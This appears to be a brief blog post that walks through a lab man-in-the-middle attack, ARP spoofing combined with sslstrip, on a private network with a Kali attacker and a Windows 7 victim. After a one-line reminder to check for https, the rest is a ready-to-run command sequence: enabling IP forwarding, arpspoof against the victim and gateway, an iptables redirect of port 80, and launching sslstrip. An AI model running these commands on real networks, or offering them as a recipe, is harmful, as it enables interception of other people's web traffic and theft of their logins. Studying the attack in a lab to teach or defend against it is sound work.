Archive for the ‘ssl’ Category
You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?
Victim – Windows 7 – 192.168.100.11
Attacker – Kali linux – 192.168.100.215
arpspoof gateway – 192.168.100.1
•Flip your machine into forwarding mode.
echo "1" > /proc/sys/net/ipv4/ip_forward
•Run arpspoof to convince a network they should send their traffic to you.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
arpspoof -i eth0 -t 192.168.100.11 192.168.100.1
•Setup iptables to redirect HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip.py -l <listenPort>